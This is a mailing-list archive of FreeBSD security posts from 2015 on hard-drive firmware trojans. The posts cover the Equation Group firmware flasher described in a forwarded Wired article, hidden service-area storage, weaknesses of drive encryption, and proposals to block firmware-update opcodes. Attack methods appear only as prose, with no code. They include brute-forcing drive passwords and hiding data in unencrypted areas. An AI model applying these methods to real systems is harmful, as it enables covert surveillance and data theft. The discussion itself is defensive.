From owner-freebsd-security@FreeBSD.ORG Sun Feb 22 10:44:27 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id B5F69792; Sun, 22 Feb 2015 10:44:27 +0000 (UTC) Received: from mail-oi0-x235.google.com (mail-oi0-x235.google.com [IPv6:2607:f8b0:4003:c06::235]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 67A3AC8B; Sun, 22 Feb 2015 10:44:27 +0000 (UTC) Received: by mail-oi0-f53.google.com with SMTP id u20so9359625oif.12; Sun, 22 Feb 2015 02:44:26 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:cc:content-type; bh=5bTmRMMzWxCy9BNX0El8108LCPylMOfAaV9Pj4AWGB4=; b=PSJCQSyi0uelGFudkoSnpcE/1BrZtHznD1mQSlFAgu4M1QpR4lRGdjATbsLCQ6YXe2 E/pr03vkJLnvg6YxSENZ//rFZfJlI3VNCOtfC56MbihjiD/KP/no6IoeaIE24Ql5Qa2F 83MxB7xltqgxaE+FtMsU2D6BSkvkEjm0ZSSTzPwO1I0K3A+r1oYgb0HqkqUadvYbl049 tEYGZ2sBynftIrUCZNN6rOox88ty8hSWj3D8LX0nHki8B+vgAQdGIw5jDG5K1GTPNMdd DV4McaehCGFVzW6Y3pr0SS7eUuh58+rmjbqGswZassz5Bb7GKxTz/jVsJOIhi1qt8z5M 18Dw== MIME-Version: 1.0 X-Received: by 10.60.133.174 with SMTP id pd14mr3993951oeb.79.1424601866636; Sun, 22 Feb 2015 02:44:26 -0800 (PST) Received: by 10.60.140.199 with HTTP; Sun, 22 Feb 2015 02:44:26 -0800 (PST) Date: Sun, 22 Feb 2015 05:44:26 -0500 Message-ID: Subject: trojans in the firmware From: grarpamp To: freebsd-security@freebsd.org Content-Type: text/plain; charset=UTF-8 Cc: freebsd-questions@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 22 Feb 2015 10:44:28 -0000 On Sat, Feb 21, 2015 at 8:41 AM, Kay Rydyger : Please do not quote 200 lines of text just to insert your ten. And if using the digest, use the original subject line. Else it's lazy bad form at the expense of other readers of the list. >> > Alfred Hegemeier saith: >> > just encrypt the whole hard drive with Geli. >> >> GELI works under your control for what you store on the >> drive, and you can even enable the AES encryption feature >> of the drive itself as a no cost to performance extra freebie >> underneath that. However since the raw device interface is still >> accessible, neither of them do anything to block firmware >> updates. > what has blocking firmware updates to do with > firmware being able to read the data passing > through the controller ? Reread the entire thread and all the linked materials. If your drive is clean and you kernel block the malicious firmware update command, the exploit fails and your drive remains clean. If you don't block it, then your drive gets rooted and then yes, there's nothing you can do after that. And since users don't have JTAG gear/skills and device vendors usually never publish a firmware update anyway, you can't verify or securely reflash even if you did discover it got rooted. Thus you now own a worthless brick with a warranty that won't be honored. > That encryption is a good line of defense, you can > read here: > https://www.ibr.cs.tu-bs.de/users/kurmus/papers/acsac13.pdf > in section 4.1. No hardware and software disk encryption themselves don't prevent installation of the firmware, nor help much afterwards given the current as yet non-ideal state of the entire system protection/crypto ecosystem. The MBR, boot, loader and whatever other early stages, are not encrypted or signed... malicious firmware can exploit that. It could also use DMA to read/write RAM to get your FDE keys and so on. Even SecureBoot with FDE doesn't help there. It's all caveated in the doc. To be more secure you need to disallow the malicious firmware update from taking place to begin with. The standard interface for that is through the /dev device provided by the disk driver over the bus subsystem. Block/filter out all non-production opcodes from those interfaces and and it becomes more work for kids to exploit. Add that to other defenses in depth and you're better off. Long term, you should demand the vendors include a $0.10 hardware read-only update jumper and a signed authority root anchored in the mask ROM. You should demand the t10/t11/t13/serialata standards bodies include a readout command for firmware verification and backup. For that matter, you should demand vendors include another jumper for pointing to your own installable ROM space in flash (or via pin header) and to also open up their specs so you don't have to use their literally stupid and broken firmware blobs [1]. How many tens of thousands of users strong are you BSD? How many tens of thousands of users strong is Linux? Yet all of you combined can't seem to place even two calls/mails per month to each vendor asking for these things... shame. You can and should be overloading their switchboards... they'd drop to their knees before your armies in a week. [1] Vendor code is generally buggy crap quality, quite often highly guarded just to save embarassement there, to dodge responsibility for making fixes by saying "what bugs, where", and to speed up obsolesense. From owner-freebsd-security@FreeBSD.ORG Sun Feb 22 23:48:00 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 4A093538 for ; Sun, 22 Feb 2015 23:48:00 +0000 (UTC) Received: from mx2.auckland.ac.nz (mx2.auckland.ac.nz [130.216.125.245]) (using TLSv1 with cipher RC4-SHA (128/128 bits)) (Client CN "mx2.auckland.ac.nz", Issuer "AusCERT Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 933FE84A for ; Sun, 22 Feb 2015 23:47:58 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=auckland.ac.nz; i=@auckland.ac.nz; q=dns/txt; s=uoa; t=1424648879; x=1456184879; h=date:message-id:from:to:subject:in-reply-to; bh=fkYAfgEUu/3rdi6xLyeG9H3GiTfGM1etNKRLXYmahEo=; b=X4CqZ2GB9LajFQr2J+dA9ql9+G9+GNaMoURtK9poUxVeqzNfE7m+PkES NmVZaph9sCPjFtS2XtP2h50vs2z/7qw0dvRF/H7o/81cJLn3UzhxcOXPx 8XPKbX7gafS7/6mqYwF121YSjUoQIXLS2GrPIbaWoQ9fJAtBDqTvDMeCj Q=; X-IronPort-AV: E=Sophos;i="5.04,630,1406548800"; d="scan'208";a="309291181" X-Ironport-HAT: UNIVERSITY - $RELAY-THROTTLE X-Ironport-Source: 130.216.34.40 - Outgoing - Outgoing Received: from login01.fos.auckland.ac.nz ([130.216.34.40]) by mx2-int.auckland.ac.nz with ESMTP/TLS/AES256-SHA; 23 Feb 2015 12:46:45 +1300 Received: from pgut001 by login01.fos.auckland.ac.nz with local (Exim 4.72) (envelope-from ) id 1YPgCs-0005lQ-F2; Mon, 23 Feb 2015 12:45:02 +1300 Date: Mon, 23 Feb 2015 12:45:02 +1300 Message-Id: From: Peter Gutmann To: cryptography@metzdowd.com, cypherpunks@cpunks.org, freebsd-security@freebsd.org, grarpamp@gmail.com, hbaker1@pipeline.com Subject: Re: [Cryptography] trojans in the firmware In-Reply-To: X-Mailman-Approved-At: Mon, 23 Feb 2015 00:12:30 +0000 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 22 Feb 2015 23:48:00 -0000 Henry Baker writes: >BTW, what's the point of AES encryption on this pre-p0wned device? More >security theatre? Almost. Its sole use is for very fast "drive erasure", i.e. you change the key and the data on it becomes inaccessible. Have a look at this presentation: http://www.snia.org/sites/default/education/tutorials/2012/spring/security/MichaelWillett_Implementing%20Stored-Data_Encryption_2.pdf which describes what Samsung (and others) are doing, in particular slide 18. The decryption key (DEK) is stored in the drive, and is unlocked using a password (and "authentication key", AK). So to decrypt the drive you extract the encrypted DEK, brute-force the password (AK), and you're in. In any case though it doesn't protect against an attack that occurs when the drive is mounted since it looks like an unencrypted drive at that point (and presumably the AK is hardcoded into a startup script or something similar in order to survive power outages, so you can grab that if you really need it). It's actually hard to see what purpose this "encryption" is serving (the vendors studiously avoid providing a threat model), it doesn't protect live data, it barely protects data at rest (say if you decide to Fedex the contents of your data centre across town), the only thing it really does is allow for fast erasure of contents, and protect against casual snooping of the "buy a batch of drives on ebay and see what's on them" kind. So I guess if ebay is your threat, it's good enough. OTOH a BIOS password set for the drive will do the same thing. As a more general response to "what's the point", regulatory compliance ("our drives were encrypted so we don't have to disclose the 40M credit card breach from last week"), buzzword-compliance, CYA, it's not a bad idea from a marketing point of view. Peter. From owner-freebsd-security@FreeBSD.ORG Mon Feb 23 04:54:41 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 82063166 for ; Mon, 23 Feb 2015 04:54:41 +0000 (UTC) Received: from mail-ob0-f171.google.com (mail-ob0-f171.google.com [209.85.214.171]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 46D82999 for ; Mon, 23 Feb 2015 04:54:40 +0000 (UTC) Received: by mail-ob0-f171.google.com with SMTP id gq1so34427684obb.2 for ; Sun, 22 Feb 2015 20:54:34 -0800 (PST) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to:cc:content-type; bh=cvEJV0XNbtjY+bTZEBnNQoUElC1i9LJsGfqOfA4VGaw=; b=iNz2/EiDKvIlFfx2bfO1xFQAkVdrT29oG/Q3+IeyOoYJ35FrE58od4soqG9BnMrBqZ FirjFaR7GzJza/x7mze5fTeFK9q53kfgpaJHgolu3zuMhBUL2ffAwuomdVUjJjrQb0LZ ziN/tMxaGS1OM2hw8LLuOGdoy9CQ+dEvsO2KRXKg3XzWhKQ0KCer2APBLCSW8Jd7vh6/ NKSSrIMi9HQQPVOlf4k6iT6hJFEQ0iew5BHaf9Yp63xS1fhO+OqUPxpl1uC9dbachT88 1wbiIlUM4wjf4UMzGXs/6Z+ZOPB0TDlPTOh0/krRz2SH+2eu+ZdUtnNHu6BQ0sFk4KGB A8+w== X-Gm-Message-State: ALoCoQnNWhx2AdyjEjlAfiHlqrIGAariFrvWUnm1yeVkQt3Z2pOD44vqDzFaP+SxTZXQqGII/hso X-Received: by 10.60.92.66 with SMTP id ck2mr6379834oeb.30.1424666915888; Sun, 22 Feb 2015 20:48:35 -0800 (PST) MIME-Version: 1.0 Received: by 10.182.224.197 with HTTP; Sun, 22 Feb 2015 20:48:15 -0800 (PST) In-Reply-To: References: From: Tom Mitchell Date: Sun, 22 Feb 2015 20:48:15 -0800 Message-ID: Subject: Re: [Cryptography] trojans in the firmware To: Peter Gutmann X-Mailman-Approved-At: Mon, 23 Feb 2015 12:37:24 +0000 Content-Type: text/plain; charset=UTF-8 X-Content-Filtered-By: Mailman/MimeDel 2.1.18-1 Cc: cpunks , freebsd-security@freebsd.org, "cryptography@metzdowd.com" , grarpamp , Henry Baker X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 23 Feb 2015 04:54:41 -0000 On Sun, Feb 22, 2015 at 3:45 PM, Peter Gutmann wrote: > Henry Baker writes: > > >BTW, what's the point of AES encryption on this pre-p0wned device? More > >security theatre? > > Almost. Its sole use is for very fast "drive erasure", i.e. you change the > key and the data on it becomes inaccessible. Have a look > Yes... In addition it can be of value for a remote wipe. This is interesting with phone home software that then discovers it has been reported lost. A small handshake and one company might duck having to report a massive data breach. The single largest value is the release of devices that once lived in an interesting location and needs to be transported to a destruction location. Perhaps not national secrets but Amazon or Google compute center.. or pharma... or medical records. More valuable to RAID vendors than customers of RAID vendors as it can be used to limit vendor liability as they replace one rack with a new one and have to manage the trash. Someone once commented to me that NSA and TLAs like milling machines and the curie point of media. All must transport the device to be trashed. Some individuals in the early steps of the custody chain might like a quick wipe method. Some should mention the terrible handling of disks in copy machines. This could help in the decommission or service process but does not solve bankruptcy induced problems. -- T o m M i t c h e l l From owner-freebsd-security@FreeBSD.ORG Mon Feb 23 23:10:00 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id BF927D9C; Mon, 23 Feb 2015 23:10:00 +0000 (UTC) Received: from mail-ob0-x22f.google.com (mail-ob0-x22f.google.com [IPv6:2607:f8b0:4003:c01::22f]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 771A5E91; Mon, 23 Feb 2015 23:10:00 +0000 (UTC) Received: by mail-ob0-f175.google.com with SMTP id va2so39969224obc.6; Mon, 23 Feb 2015 15:09:59 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type:content-transfer-encoding; bh=C418XS7f9XMZtG5l2BlGRQPBxcAfn2oBZzX6lltXWEI=; b=EM5VERUEd4VigSX8GFMxg9WJexery77NM2asv8UqRFnthhsmV6V6iihSf595t41VaK V1rCQWEb8QQOrX+UZe9x9o7k4X9LvTUacAHfSYgtX8dAxbDj8r2nOEe1wvsN4gFvXtY9 jXVOBP7d8WEBABz1UrSThZOOGijsrgpH+A+fAvM3EWj3QJThyXr3MYO0EIOZxuyT1ZHh t4AKfIXfSJV8+xMdSLWnN5HkG1s/hA/RupTamO18vNc0At0oWokcIs0nLLb99Sti2f8J 1zmphKzI2xNhxE/VdbAEuqym+trgYgi3Dkt0/xdpBx01wYY4LIfAhEzscnHWUB+TrrlP /ZIQ== MIME-Version: 1.0 X-Received: by 10.182.165.202 with SMTP id za10mr9095760obb.8.1424732999673; Mon, 23 Feb 2015 15:09:59 -0800 (PST) Received: by 10.60.140.199 with HTTP; Mon, 23 Feb 2015 15:09:59 -0800 (PST) In-Reply-To: References: <54E2B04C.9080707@av8n.com> <54E436FB.9000709@deadhat.com> <711B69EB-1CBF-4F03-9336-AFEBE0B857A0@callas.org> Date: Mon, 23 Feb 2015 18:09:59 -0500 Message-ID: Subject: Fwd: [Cryptography] trojans in the firmware From: grarpamp To: cypherpunks@cpunks.org Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 23 Feb 2015 23:10:00 -0000 > http://www.recover.co.il/SA-cover/SA-cover.pdf Since the firmware rules over everything, all the spare sectors for block reallocation must be considered too, not just the service areas. Then there is the per sector CRC space that could perhaps be reutilized if CRC is implemented as software function. Kernel options to permit only your approved list of opcodes and block all else by default would seem useful to have. > http://www.spiegel.de/media/media-35661.pdf Again, look at the list of Unix operating systems and file systems. These guys are calling Unix out by name, and soon the common script kid will be too. Unix is under attack and this stuff can't be ignored as "too rare and/or hard and/or low market share to be relavent" anymore. ---------- Forwarded message ---------- Date: Mon, Feb 23, 2015 at 12:10 PM Subject: Re: [Cryptography] trojans in the firmware FYI -- CMU has been hacking disk drive firmware since the 1990's for "smart disks" and "performance"; UCSD has been hacking flash drive firmware more recently. I believe that DARPA has also openly solicited for disk drive/flash drive firmware hacking capabilities. Both CMU & UCSD are hotbeds of NSA recruitment activity. We now know that in NSA parlance "smart" anything =3D "spying" anything; e.g., "smart disks" =3D "spying disks"; "smart phones" =3D "spying phones", etc. BTW, hiding stuff in a flash memory stick is even easier than in a hard drive. This is because flash memory is so unreliable, that there is typically a huge percentage of unused space; the cheaper the flash memory, the smaller the fraction of usable reliable memory space. So it wouldn't be at all surprising to find that your 32GB flash drive is really constructed from 64GB chips, and that 50% of the device is unavailable for use. It is highly unlikely that _all_ of this unused space is unreliable, so this leaves plenty of room for NSA lurking. But even if the device were 100% reliable, noticing that only 50% was actually in use would be unremarkable, given the typical degree of unreliability of these types of devices. For these reasons, it is critical for flash memory devices to _open up_ their API's, so that the raw memory (with all of its warts) can be inspected and verified. http://www.wired.com/2015/02/nsa-firmware-hacking/ How the NSA=E2=80=99s Firmware Hacking Works and Why It=E2=80=99s So Unsett= ling By Kim Zetter 02.22.15 8:09 pm One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive=E2=80=99s firmware with malicious code. T= he Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware=E2=80=94-the guts of any computer=E2=80=94-=E2=80=9Csur= passes anything else=E2=80=9D they had ever seen. The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named =E2=80=9Cnls_933w.dll=E2=80=9D, is the= first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don=E2=80=99t get encrypted. Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky=E2=80=99s Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here=E2=80=99s what we know about the firmware-flashing module. How It Works Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides. When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquatinoDrug and one with a 2013 compilation date that is used with GrayFish. The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer=E2=80=99s operating system and reinstalls it t= o eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one. The attack works because firmware was never designed with security in mind. Hard disk makers don=E2=80=99t cryptographically sign the firmware t= hey install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don=E2=80=99t examine it. There=E2=80=99s also no easy way for us= ers to read the firmware and manually check if it=E2=80=99s been altered. The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba. =E2=80=9CYou know how much effort it takes to land just one firmware for a hard drive? You need to know specifications, the CPU, the architecture of the firmware, how it works,=E2=80=9D Raiu says. The Kasper= sky researchers have called it =E2=80=9Can astonishing technical accomplishment and is testament to the group=E2=80=99s abilities.=E2=80=9D Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation. Hidden Storage Is the Holy Grail The revelation that the firmware hack helps store data the attackers want to steal didn=E2=80=99t get much play when the story broke last week, = but it=E2=80=99s the most significant part of the hack. It also raises a numbe= r of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there=E2=80=99s still a lot that=E2=80=99s unknown about = the attack, but some of it can be surmised. The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they=E2=80=99re unencrypte= d and save them to this hidden area on the machine that doesn=E2=80=99t get encrypted. There isn=E2=80=99t much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption. =E2=80=9CTaking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area,=E2=80=9D Raiu says. Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls =E2=80=9Ccustoms opportunities,=E2= =80=9D and extract the password from this hidden area to unlock the encrypted disk. http://cryptome.org/2014/05/nsa-customs.htm Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications. =E2=80=9C[The owners] only use it in some very specific cases where there i= s no other way around it,=E2=80=9D Raiu says. =E2=80=9CThink about Bin Laden= who lived in the desert in an isolated compound=E2=80=94-doesn=E2=80=99t have interne= t and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific.=E2=80=9D Raiu thinks, however, that the attackers have a grander scheme in mind. =E2=80=9CIn the future probably they want to take it to the next lev= el where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs.=E2=80=9D They wouldn=E2=80=99t need the password if they could copy an entire direct= ory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists. There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved are or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted =E2=80=9Cnot only that these areas can=E2=80=99t be sanitized (via standard= tools), they cannot be accessed via anti-virus software [or] computer forensics tools.=E2=80=9D http://www.recover.co.il/SA-cover/SA-cover.pdf Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage. To write or copy data to service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, =E2=80=9C[b]y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible,=E2=80=9D Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail. One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there=E2=80=99s only 80 MB, it=E2=80=99s a dead giveaway= that something is there that shouldn=E2=80=99t be. But a leaked NSA document th= at was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem. NSA Interns to the Rescue The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the =E2=80=9CCovert Storage=E2= =80=9D project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk. http://www.spiegel.de/media/media-35661.pdf =E2=80=9CThe idea would be to modify the firmware of a particular hard driv= e so that it normally only recognizes, say, half of its available space,=E2=80=9D the document reads. =E2=80=9CIt would report this size bac= k to the operating system and not provide any way to access the additional space.=E2=80=9D Only one partition of the drive would be visible on the partition table, leaving the other partitions=E2=80=94-where the hidden dat= a was stored=E2=80=94-invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command. How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out. _______________________________________________ From owner-freebsd-security@FreeBSD.ORG Tue Feb 24 13:09:46 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 18F7C92D for ; Tue, 24 Feb 2015 13:09:46 +0000 (UTC) Received: from mail-wi0-x233.google.com (mail-wi0-x233.google.com [IPv6:2a00:1450:400c:c05::233]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id A7E76679 for ; Tue, 24 Feb 2015 13:09:45 +0000 (UTC) Received: by mail-wi0-f179.google.com with SMTP id ex7so4726061wid.0 for ; Tue, 24 Feb 2015 05:09:44 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=20120113; h=date:from:to:subject:message-id:in-reply-to:references:mime-version :content-type:content-transfer-encoding; bh=HMqQXi8lr8w9crmf9LPVXPCi0beMMj17Yf4z1E65O9o=; b=ovCYmFDn0gZ86WTDOJ2i/L27raLzJU6LDn+cn6yhBe+RNBco4IGFXItIZvA5qY5xbB 4MdGTwLaOJw3xgO1K15lJbq0GrUl1tbMCpjJRp/JYQtkTaVeD5dRkRVO+KBD0wtkSueZ wKbz8hUxCBTw++gTWFgu81EoSF9h2PRWqQT8I5xjhM4c1uD1tHNDI11dexk4ImKAE1jo yLbMfPhSCp5OkWdeyTZ/9WvvBc2mgqU+4OHjPlMbN6KcP0Vgo2M1SZdyP4zK9cLgKhAE OXRrB3i8M62TtaBXWu0VWSCTA2P3O5l80ixofL9VYj3MuFVG2JbEDkv+vGIquRacrgQ2 ax9w== X-Received: by 10.180.187.97 with SMTP id fr1mr15529392wic.1.1424783383927; Tue, 24 Feb 2015 05:09:43 -0800 (PST) Received: from gumby.homeunix.com (4e5670d9.skybroadband.com. [78.86.112.217]) by mx.google.com with ESMTPSA id eb10sm20493797wib.13.2015.02.24.05.09.42 for (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Tue, 24 Feb 2015 05:09:43 -0800 (PST) Date: Tue, 24 Feb 2015 13:09:41 +0000 From: RW To: freebsd-security@freebsd.org Subject: Re: [Cryptography] trojans in the firmware Message-ID: <20150224130941.5b0998bc@gumby.homeunix.com> In-Reply-To: References: X-Mailer: Claws Mail 3.11.1 (GTK+ 2.24.25; amd64-portbld-freebsd10.0) MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 24 Feb 2015 13:09:46 -0000 On Mon, 23 Feb 2015 12:45:02 +1300 Peter Gutmann wrote: > Henry Baker writes: > > >BTW, what's the point of AES encryption on this pre-p0wned device? > >More security theatre? > > Almost. Its sole use is for very fast "drive erasure", i.e. you > change the key and the data on it becomes inaccessible. Have a look > at this presentation: > > http://www.snia.org/sites/default/education/tutorials/2012/spring/security/MichaelWillett_Implementing%20Stored-Data_Encryption_2.pdf > > which describes what Samsung (and others) are doing, in particular > slide 18. The decryption key (DEK) is stored in the drive, and is > unlocked using a password (and "authentication key", AK). So to > decrypt the drive you extract the encrypted DEK, brute-force the > password (AK), and you're in. This is how practically all disk encryption works. Whether or not it's secure depends on the strength of the password + key-file. From owner-freebsd-security@FreeBSD.ORG Tue Feb 24 13:30:21 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 19885C14 for ; Tue, 24 Feb 2015 13:30:21 +0000 (UTC) Received: from mail-qa0-x22c.google.com (mail-qa0-x22c.google.com [IPv6:2607:f8b0:400d:c00::22c]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id C4D0F916 for ; Tue, 24 Feb 2015 13:30:20 +0000 (UTC) Received: by mail-qa0-f44.google.com with SMTP id n8so26966961qaq.3 for ; Tue, 24 Feb 2015 05:30:19 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:sender:in-reply-to:references:date:message-id:subject :from:to:cc:content-type; bh=EsjV/3uJvEDhpPUnEkKuXdICQF+9lzTv6+hWscf1IGA=; b=Xqi6reZ/A6/uRWv04QVt2OiO3K1PJAWBWz0+FxKWxdaSbeDcF4BxhkTgRGGOtzPDaM 